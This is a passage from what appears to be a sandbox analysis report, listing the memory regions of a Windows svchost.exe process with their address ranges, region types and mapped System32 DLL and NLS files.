	        filename = "\\Windows\\System32\\C_1257.NLS" (normalized: "c:\\windows\\system32\\c_1257.nls")

Region:
	              id = 1097
	        start_va = 0x16572d20000
	          end_va = 0x16572d30fff
	     entry_point = 0x16572d20000
	     region_type = mapped_file
	            name = "c_1255.nls"
	        filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls")

Region:
	              id = 1098
	        start_va = 0x16572d40000
	          end_va = 0x16572d67fff
	     entry_point = 0x16572d40000
	     region_type = mapped_file
	            name = "c_932.nls"
	        filename = "\\Windows\\System32\\C_932.NLS" (normalized: "c:\\windows\\system32\\c_932.nls")

Region:
	              id = 1099
	        start_va = 0x16572d70000
	          end_va = 0x16572da0fff
	     entry_point = 0x16572d70000
	     region_type = mapped_file
	            name = "c_949.nls"
	        filename = "\\Windows\\System32\\C_949.NLS" (normalized: "c:\\windows\\system32\\c_949.nls")

Region:
	              id = 1100
	        start_va = 0x16572db0000
	          end_va = 0x16572dc0fff
	     entry_point = 0x16572db0000
	     region_type = mapped_file
	            name = "c_874.nls"
	        filename = "\\Windows\\System32\\C_874.NLS" (normalized: "c:\\windows\\system32\\c_874.nls")

Region:
	              id = 1101
	        start_va = 0x16572dd0000
	          end_va = 0x16572de0fff
	     entry_point = 0x16572dd0000
	     region_type = mapped_file
	            name = "c_1258.nls"
	        filename = "\\Windows\\System32\\C_1258.NLS" (normalized: "c:\\windows\\system32\\c_1258.nls")

Region:
	              id = 1102
	        start_va = 0x16572df0000
	          end_va = 0x16572e20fff
	     entry_point = 0x16572df0000
	     region_type = mapped_file
	            name = "c_936.nls"
	        filename = "\\Windows\\System32\\C_936.NLS" (normalized: "c:\\windows\\system32\\c_936.nls")

Region:
	              id = 1103
	        start_va = 0x16572e30000
	          end_va = 0x16572e60fff
	     entry_point = 0x16572e30000
	     region_type = mapped_file
	            name = "c_950.nls"
	        filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls")

Region:
	              id = 1104
	        start_va = 0x16572e90000
	          end_va = 0x16572e96fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016572e90000"
	        filename = ""

Region:
	              id = 1105
	        start_va = 0x16572f00000
	          end_va = 0x16572ffffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016572f00000"
	        filename = ""

Region:
	              id = 1106
	        start_va = 0x16573000000
	          end_va = 0x165730fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016573000000"
	        filename = ""

Region:
	              id = 1107
	        start_va = 0x16573100000
	          end_va = 0x165731fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016573100000"
	        filename = ""

Region:
	              id = 1108
	        start_va = 0x16573200000
	          end_va = 0x165732fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016573200000"
	        filename = ""

Region:
	              id = 1109
	        start_va = 0x7df5ffc90000
	          end_va = 0x7ff5ffc8ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ffc90000"
	        filename = ""

Region:
	              id = 1110
	        start_va = 0x7ff795430000
	          end_va = 0x7ff79552ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff795430000"
	        filename = ""

Region:
	              id = 1111
	        start_va = 0x7ff795530000
	          end_va = 0x7ff795552fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff795530000"
	        filename = ""

Region:
	              id = 1112
	        start_va = 0x7ff795570000
	          end_va = 0x7ff79557cfff
	     entry_point = 0x7ff795570000
	     region_type = mapped_file
	            name = "svchost.exe"
	        filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")

Region:
	              id = 1113
	        start_va = 0x7ffbf6480000
	          end_va = 0x7ffbf64d1fff
	     entry_point = 0x7ffbf6480000
	     region_type = mapped_file
	            name = "cryptngc.dll"
	        filename = "\\Windows\\System32\\cryptngc.dll" (normalized: "c:\\windows\\system32\\cryptngc.dll")

Region:
	              id = 1114
	        start_va = 0x7ffbf6730000
	          end_va = 0x7ffbf6796fff
	     entry_point = 0x7ffbf6730000
	     region_type = mapped_file
	            name = "upnp.dll"
	        filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll")

Region:
	              id = 1115
	        start_va = 0x7ffbf67a0000
	          end_va = 0x7ffbf68bcfff
	     entry_point = 0x7ffbf67a0000
	     region_type = mapped_file
	            name = "qmgr.dll"
	        filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll")

Region:
	              id = 1116
	        start_va = 0x7ffbfdc20000
	          end_va = 0x7ffbfdc63fff
	     entry_point = 0x7ffbfdc20000
	     region_type = mapped_file
	            name = "updatehandlers.dll"
	        filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll")

Region:
	              id = 1117
	        start_va = 0x7ffbfdc70000
	          end_va = 0x7ffbfdcccfff
	     entry_point = 0x7ffbfdc70000
	     region_type = mapped_file
	            name = "usocore.dll"
	        filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll")

Region:
	              id = 1118
	        start_va = 0x7ffbfdef0000
	          end_va = 0x7ffbfe0effff
	     entry_point = 0x7ffbfdef0000
	     region_type = mapped_file
	            name = "wlidsvc.dll"
	        filename = "\\Windows\\System32\\wlidsvc.dll" (normalized: "c:\\windows\\system32\\wlidsvc.dll")

Region:
	              id = 1119
	        start_va = 0x7ffbfe1a0000
	          end_va = 0x7ffbfe1b7fff
	     entry_point = 0x7ffbfe1a0000
	     region_type = mapped_file
	            name = "locationframeworkinternalps.dll"
	        filename = "\\Windows\\System32\\LocationFrameworkInternalPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkinternalps.dll")

Region:
	              id = 1120
	        start_va = 0x7ffbfe1c0000
	          end_va = 0x7ffbfe1d6fff
	     entry_point = 0x7ffbfe1c0000
	     region_type = mapped_file
	            name = "usoapi.dll"
	        filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll")

Region:
	              id = 1121
	        start_va = 0x7ffc022d0000
	          end_va = 0x7ffc0230efff
	     entry_point = 0x7ffc022d0000
	     region_type = mapped_file
	            name = "tcpipcfg.dll"
	        filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll")

Region:
	              id = 1122
	        start_va = 0x7ffc03c60000
	          end_va = 0x7ffc03c8efff
	     entry_point = 0x7ffc03c60000
	     region_type = mapped_file
	            name = "cryptnet.dll"
	        filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll")

Region:
	              id = 1123
	        start_va = 0x7ffc03cc0000
	          end_va = 0x7ffc03cd3fff
	     entry_point = 0x7ffc03cc0000
	     region_type = mapped_file
	            name = "mskeyprotect.dll"
	        filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll")

Region:
	              id = 1124
	        start_va = 0x7ffc03ce0000
	          end_va = 0x7ffc03d34fff
	     entry_point = 0x7ffc03ce0000
	     region_type = mapped_file
	            name = "ncryptprov.dll"
	        filename = "\\Windows\\System32\\ncryptprov.dll" (normalized: "c:\\windows\\system32\\ncryptprov.dll")

Region:
	              id = 1125
	        start_va = 0x7ffc03d40000
	          end_va = 0x7ffc03d5dfff
	     entry_point = 0x7ffc03d40000
	     region_type = mapped_file
	            name = "ncryptsslp.dll"
	        filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll")

Region:
	              id = 1126
	        start_va = 0x7ffc03dc0000
	          end_va = 0x7ffc03dd1fff
	     entry_point = 0x7ffc03dc0000
	     region_type = mapped_file
	            name = "bitsproxy.dll"
	        filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll")

Region:
	              id = 1127
	        start_va = 0x7ffc03de0000
	          end_va = 0x7ffc03df3fff
	     entry_point = 0x7ffc03de0000
	     region_type = mapped_file
	            name = "bitsigd.dll"
	        filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll")

Region:
	              id = 1128
	        start_va = 0x7ffc03e00000
	          end_va = 0x7ffc03e1efff
	     entry_point = 0x7ffc03e00000
	     region_type = mapped_file
	            name = "ncprov.dll"
	        filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll")

Region:
	              id = 1129
	        start_va = 0x7ffc03f90000
	          end_va = 0x7ffc0400ffff
	     entry_point = 0x7ffc03f90000
	     region_type = mapped_file
	            name = "webio.dll"
	        filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")

Region:
	              id = 1130
	        start_va = 0x7ffc040a0000
	          end_va = 0x7ffc040b5fff
	     entry_point = 0x7ffc040a0000
	     region_type = mapped_file
	            name = "wwapi.dll"
	        filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll")

Region:
	              id = 1131
	        start_va = 0x7ffc048e0000
	          end_va = 0x7ffc04905fff
	     entry_point = 0x7ffc048e0000
	     region_type = mapped_file
	            name = "srvcli.dll"
	        filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")

Region:
	              id = 1132
	        start_va = 0x7ffc05ef0000
	          end_va = 0x7ffc05f06fff
	     entry_point = 0x7ffc05ef0000
	     region_type = mapped_file
	            name = "msauserext.dll"
	        filename = "\\Windows\\System32\\msauserext.dll" (normalized: "c:\\windows\\system32\\msauserext.dll")

Region:
	              id = 1133
	        start_va = 0x7ffc061b0000
	          end_va = 0x7ffc061c0fff
	     entry_point = 0x7ffc061b0000
	     region_type = mapped_file
	            name = "tetheringclient.dll"
	        filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll")

Region:
	              id = 1134
	        start_va = 0x7ffc061d0000
	          end_va = 0x7ffc06253fff
	     entry_point = 0x7ffc061d0000
	     region_type = mapped_file
	            name = "wbemess.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll")

Region:
	              id = 1135
	        start_va = 0x7ffc06260000
	          end_va = 0x7ffc06275fff
	     entry_point = 0x7ffc06260000
	     region_type = mapped_file
	            name = "ncobjapi.dll"
	        filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")

Region:
	              id = 1136
	        start_va = 0x7ffc06280000
	          end_va = 0x7ffc06355fff
	     entry_point = 0x7ffc06280000
	     region_type = mapped_file
	            name = "wmiprvsd.dll"
	        filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll")

Region:
	              id = 1137
	        start_va = 0x7ffc06360000
	          end_va = 0x7ffc0636efff
	     entry_point = 0x7ffc06360000
	     region_type = mapped_file
	            name = "nci.dll"
	        filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll")

Region:
	              id = 1138
	        start_va = 0x7ffc06370000
	          end_va = 0x7ffc063d3fff
	     entry_point = 0x7ffc06370000
	     region_type = mapped_file
	            name = "repdrvfs.dll"
	        filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll")

Region:
	              id = 1139
	        start_va = 0x7ffc063e0000
	          end_va = 0x7ffc06404fff
	     entry_point = 0x7ffc063e0000
	     region_type = mapped_file
	            name = "wmiutils.dll"
	        filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")

Region:
	              id = 1140
	        start_va = 0x7ffc06410000
	          end_va = 0x7ffc06423fff
	     entry_point = 0x7ffc06410000
	     region_type = mapped_file
	            name = "wbemsvc.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")

Region:
	              id = 1141
	        start_va = 0x7ffc06430000
	          end_va = 0x7ffc06525fff
	     entry_point = 0x7ffc06430000
	     region_type = mapped_file
	            name = "fastprox.dll"
	        filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")

Region:
	              id = 1142
	        start_va = 0x7ffc06530000
	          end_va = 0x7ffc065a3fff
	     entry_point = 0x7ffc06530000
	     region_type = mapped_file
	            name = "esscli.dll"
	        filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll")

Region:
	              id = 1143
	        start_va = 0x7ffc065b0000
	          end_va = 0x7ffc066e6fff
	     entry_point = 0x7ffc065b0000
	     region_type = mapped_file
	            name = "wbemcore.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll")

Region:
	              id = 1144
	        start_va = 0x7ffc06a90000
	          end_va = 0x7ffc06ab7fff
	     entry_point = 0x7ffc06a90000
	     region_type = mapped_file
	            name = "dssenh.dll"
	        filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll")

Region:
	              id = 1145
	        start_va = 0x7ffc06ac0000
	          end_va = 0x7ffc06ad5fff
	     entry_point = 0x7ffc06ac0000
	     region_type = mapped_file
	            name = "napinsp.dll"
	        filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")

Region:
	              id = 1146
	        start_va = 0x7ffc06ae0000
	          end_va = 0x7ffc06af9fff
	     entry_point = 0x7ffc06ae0000
	     region_type = mapped_file
	            name = "pnrpnsp.dll"
	        filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")

Region:
	              id = 1147
	        start_va = 0x7ffc06b00000
	          end_va = 0x7ffc06b0cfff
	     entry_point = 0x7ffc06b00000
	     region_type = mapped_file
	            name = "winrnr.dll"
	        filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")

Region:
	              id = 1148
	        start_va = 0x7ffc06b10000
	          end_va = 0x7ffc06b35fff
	     entry_point = 0x7ffc06b10000
	     region_type = mapped_file
	            name = "browser.dll"
	        filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll")

Region:
	              id = 1149
	        start_va = 0x7ffc06b40000
	          end_va = 0x7ffc06b57fff
	     entry_point = 0x7ffc06b40000
	     region_type = mapped_file
	            name = "dmcmnutils.dll"
	        filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll")

Region:
	              id = 1150
	        start_va = 0x7ffc06b70000
	          end_va = 0x7ffc06b7afff
	     entry_point = 0x7ffc06b70000
	     region_type = mapped_file
	            name = "bitsperf.dll"
	        filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll")

Region:
	              id = 1151
	        start_va = 0x7ffc06b80000
	          end_va = 0x7ffc06b90fff
	     entry_point = 0x7ffc06b80000
	     region_type = mapped_file
	            name = "wbemprox.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")

Region:
	              id = 1152
	        start_va = 0x7ffc06ba0000
	          end_va = 0x7ffc06bbdfff
	     entry_point = 0x7ffc06ba0000
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll")

Region:
	              id = 1153
	        start_va = 0x7ffc06bc0000
	          end_va = 0x7ffc06c41fff
	     entry_point = 0x7ffc06bc0000
	     region_type = mapped_file
	            name = "hnetcfg.dll"
	        filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll")

Region:
	              id = 1154
	        start_va = 0x7ffc06c50000
	          end_va = 0x7ffc06c91fff
	     entry_point = 0x7ffc06c50000
	     region_type = mapped_file
	            name = "wdscore.dll"
	        filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll")

Region:
	              id = 1155
	        start_va = 0x7ffc06ca0000
	          end_va = 0x7ffc06ce5fff
	     entry_point = 0x7ffc06ca0000
	     region_type = mapped_file
	            name = "adsldp.dll"
	        filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll")

Region:
	              id = 1156
	        start_va = 0x7ffc06cf0000
	          end_va = 0x7ffc06d2ffff
	     entry_point = 0x7ffc06cf0000
	     region_type = mapped_file
	            name = "adsldpc.dll"
	        filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll")

Region:
	              id = 1157
	        start_va = 0x7ffc06d30000
	          end_va = 0x7ffc06d76fff
	     entry_point = 0x7ffc06d30000
	     region_type = mapped_file
	            name = "activeds.dll"
	        filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll")

Region:
	              id = 1158
	        start_va = 0x7ffc06d80000
	          end_va = 0x7ffc06d9efff
	     entry_point = 0x7ffc06d80000
	     region_type = mapped_file
	            name = "netsetupapi.dll"
	        filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll")

Region:
	              id = 1159
	        start_va = 0x7ffc06da0000
	          end_va = 0x7ffc06e18fff
	     entry_point = 0x7ffc06da0000
	     region_type = mapped_file
	            name = "netsetupshim.dll"
	        filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll")

Region:
	              id = 1160
	        start_va = 0x7ffc06e60000
	          end_va = 0x7ffc06e77fff
	     entry_point = 0x7ffc06e60000
	     region_type = mapped_file
	            name = "adhsvc.dll"
	        filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll")

Region:
	              id = 1161
	        start_va = 0x7ffc06e80000
	          end_va = 0x7ffc06ea4fff
	     entry_point = 0x7ffc06e80000
	     region_type = mapped_file
	            name = "httpprxm.dll"
	        filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll")

Region:
	              id = 1162
	        start_va = 0x7ffc06ee0000
	          end_va = 0x7ffc06f82fff
	     entry_point = 0x7ffc06ee0000
	     region_type = mapped_file
	            name = "clusapi.dll"
	        filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll")

Region:
	              id = 1163
	        start_va = 0x7ffc06f90000
	          end_va = 0x7ffc06fe1fff
	     entry_point = 0x7ffc06f90000
	     region_type = mapped_file
	            name = "resutils.dll"
	        filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll")

Region:
	              id = 1164
	        start_va = 0x7ffc06ff0000
	          end_va = 0x7ffc0701dfff
	     entry_point = 0x7ffc06ff0000
	     region_type = mapped_file
	            name = "wmidcom.dll"
	        filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll")

Region:
	              id = 1165
	        start_va = 0x7ffc07020000
	          end_va = 0x7ffc0707dfff
	     entry_point = 0x7ffc07020000
	     region_type = mapped_file
	            name = "miutils.dll"
	        filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll")

Region:
	              id = 1166
	        start_va = 0x7ffc07080000
	          end_va = 0x7ffc0709ffff
	     entry_point = 0x7ffc07080000
	     region_type = mapped_file
	            name = "mi.dll"
	        filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll")

Region:
	              id = 1167
	        start_va = 0x7ffc070a0000
	          end_va = 0x7ffc070a8fff
	     entry_point = 0x7ffc070a0000
	     region_type = mapped_file
	            name = "sscoreext.dll"
	        filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll")

Region:
	              id = 1168
	        start_va = 0x7ffc070b0000
	          end_va = 0x7ffc070c0fff
	     entry_point = 0x7ffc070b0000
	     region_type = mapped_file
	            name = "sscore.dll"
	        filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll")

Region:
	              id = 1169
	        start_va = 0x7ffc070d0000
	          end_va = 0x7ffc07110fff
	     entry_point = 0x7ffc070d0000
	     region_type = mapped_file
	            name = "sqmapi.dll"
	        filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll")

Region:
	              id = 1170
	        start_va = 0x7ffc07120000
	          end_va = 0x7ffc07212fff
	     entry_point = 0x7ffc07120000
	     region_type = mapped_file
	            name = "iphlpsvc.dll"
	        filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll")

Region:
	              id = 1171
	        start_va = 0x7ffc07830000
	          end_va = 0x7ffc07847fff
	     entry_point = 0x7ffc07830000
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll")

Region:
	              id = 1172
	        start_va = 0x7ffc07850000
	          end_va = 0x7ffc079d1fff
	     entry_point = 0x7ffc07850000
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll")

Region:
	              id = 1173
	        start_va = 0x7ffc07d80000
	          end_va = 0x7ffc07dcbfff
	     entry_point = 0x7ffc07d80000
	     region_type = mapped_file
	            name = "srvsvc.dll"
	        filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll")

Region:
	              id = 1174
	        start_va = 0x7ffc07e60000
	          end_va = 0x7ffc07edefff
	     entry_point = 0x7ffc07e60000
	     region_type = mapped_file
	            name = "wbemcomn.dll"
	        filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")

Region:
	              id = 1175
	        start_va = 0x7ffc07ee0000
	          end_va = 0x7ffc07f1bfff
	     entry_point = 0x7ffc07ee0000
	     region_type = mapped_file
	            name = "wmisvc.dll"
	        filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll")

Region:
	              id = 1176
	        start_va = 0x7ffc07fd0000
	          end_va = 0x7ffc07fdbfff
	     entry_point = 0x7ffc07fd0000
	     region_type = mapped_file
	            name = "secur32.dll"
	        filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")

Region:
	              id = 1177
	        start_va = 0x7ffc09bb0000
	          end_va = 0x7ffc09be4fff
	     entry_point = 0x7ffc09bb0000
	     region_type = mapped_file
	            name = "fwpolicyiomgr.dll"
	        filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll")

Region:
	              id = 1178
	        start_va = 0x7ffc09c10000
	          end_va = 0x7ffc09e89fff
	     entry_point = 0x7ffc09c10000
	     region_type = mapped_file
	            name = "msxml6.dll"
	        filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll")

Region:
	              id = 1179
	        start_va = 0x7ffc09e90000
	          end_va = 0x7ffc09ecffff
	     entry_point = 0x7ffc09e90000
	     region_type = mapped_file
	            name = "netprofm.dll"
	        filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")

Region:
	              id = 1180
	        start_va = 0x7ffc0a0e0000
	          end_va = 0x7ffc0a0effff
	     entry_point = 0x7ffc0a0e0000
	     region_type = mapped_file
	            name = "wups.dll"
	        filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll")

Region:
	              id = 1181
	        start_va = 0x7ffc0a0f0000
	          end_va = 0x7ffc0a102fff
	     entry_point = 0x7ffc0a0f0000
	     region_type = mapped_file
	            name = "devrtl.dll"
	        filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll")

Region:
	              id = 1182
	        start_va = 0x7ffc0a110000
	          end_va = 0x7ffc0a191fff
	     entry_point = 0x7ffc0a110000
	     region_type = mapped_file
	            name = "newdev.dll"
	        filename = "\\Windows\\System32\\newdev.dll" (normalized: "c:\\windows\\system32\\newdev.dll")

Region:
	              id = 1183
	        start_va = 0x7ffc0a1a0000
	          end_va = 0x7ffc0a4d9fff
	     entry_point = 0x7ffc0a1a0000
	     region_type = mapped_file
	            name = "msi.dll"
	        filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll")

Region:
	              id = 1184
	        start_va = 0x7ffc0a4e0000
	          end_va = 0x7ffc0a563fff
	     entry_point = 0x7ffc0a4e0000
	     region_type = mapped_file
	            name = "winspool.drv"
	        filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv")

Region:
	              id = 1185
	        start_va = 0x7ffc0a570000
	          end_va = 0x7ffc0a5d4fff
	     entry_point = 0x7ffc0a570000
	     region_type = mapped_file
	            name = "wuuhext.dll"
	        filename = "\\Windows\\System32\\wuuhext.dll" (normalized: "c:\\windows\\system32\\wuuhext.dll")

Region:
	              id = 1186
	        start_va = 0x7ffc0a5e0000
	          end_va = 0x7ffc0a8d8fff
	     entry_point = 0x7ffc0a5e0000
	     region_type = mapped_file
	            name = "esent.dll"
	        filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll")

Region:
	              id = 1187
	        start_va = 0x7ffc0a8e0000
	          end_va = 0x7ffc0ab15fff
	     entry_point = 0x7ffc0a8e0000
	     region_type = mapped_file
	            name = "wuaueng.dll"
	        filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll")

Region:
	              id = 1188
	        start_va = 0x7ffc0ab20000
	          end_va = 0x7ffc0ab33fff
	     entry_point = 0x7ffc0ab20000
	     region_type = mapped_file
	            name = "windows.staterepositorybroker.dll"
	        filename = "\\Windows\\System32\\Windows.StateRepositoryBroker.dll" (normalized: "c:\\windows\\system32\\windows.staterepositorybroker.dll")

Region:
	              id = 1189
	        start_va = 0x7ffc0ab40000
	          end_va = 0x7ffc0ab61fff
	     entry_point = 0x7ffc0ab40000
	     region_type = mapped_file
	            name = "updatepolicy.dll"
	        filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll")

Region:
	              id = 1190
	        start_va = 0x7ffc0ab70000
	          end_va = 0x7ffc0ac44fff
	     entry_point = 0x7ffc0ab70000
	     region_type = mapped_file
	            name = "wuapi.dll"
	        filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll")

Region:
	              id = 1191
	        start_va = 0x7ffc0ad10000
	          end_va = 0x7ffc0ad19fff
	     entry_point = 0x7ffc0ad10000
	     region_type = mapped_file
	            name = "rasadhlp.dll"
	        filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")

Region:
	              id = 1192
	        start_va = 0x7ffc0ad20000
	          end_va = 0x7ffc0adb3fff
	     entry_point = 0x7ffc0ad20000
	     region_type = mapped_file
	            name = "staterepository.core.dll"
	        filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll")

Region:
	              id = 1193
	        start_va = 0x7ffc0adc0000
	          end_va = 0x7ffc0b062fff
	     entry_point = 0x7ffc0adc0000
	     region_type = mapped_file
	            name = "windows.staterepository.dll"
	        filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll")

Region:
	              id = 1194
	        start_va = 0x7ffc0b150000
	          end_va = 0x7ffc0b158fff
	     entry_point = 0x7ffc0b150000
	     region_type = mapped_file
	            name = "httpprxc.dll"
	        filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll")

Region:
	              id = 1195
	        start_va = 0x7ffc0b240000
	          end_va = 0x7ffc0b255fff
	     entry_point = 0x7ffc0b240000
	     region_type = mapped_file
	            name = "clipc.dll"
	        filename = "\\Windows\\System32\\Clipc.dll" (normalized: "c:\\windows\\system32\\clipc.dll")

Region:
	              id = 1196
	        start_va = 0x7ffc0b3b0000
	          end_va = 0x7ffc0b3c4fff
	     entry_point = 0x7ffc0b3b0000
	     region_type = mapped_file
	            name = "ondemandconnroutehelper.dll"
	        filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll")

Region:
	              id = 1197
	        start_va = 0x7ffc0b450000
	          end_va = 0x7ffc0b45ffff
	     entry_point = 0x7ffc0b450000
	     region_type = mapped_file
	            name = "proximityservicepal.dll"
	        filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll")

Region:
	              id = 1198
	        start_va = 0x7ffc0b460000
	          end_va = 0x7ffc0b468fff
	     entry_point = 0x7ffc0b460000
	     region_type = mapped_file
	            name = "proximitycommonpal.dll"
	        filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll")

Region:
	              id = 1199
	        start_va = 0x7ffc0b470000
	          end_va = 0x7ffc0b49cfff
	     entry_point = 0x7ffc0b470000
	     region_type = mapped_file
	            name = "proximitycommon.dll"
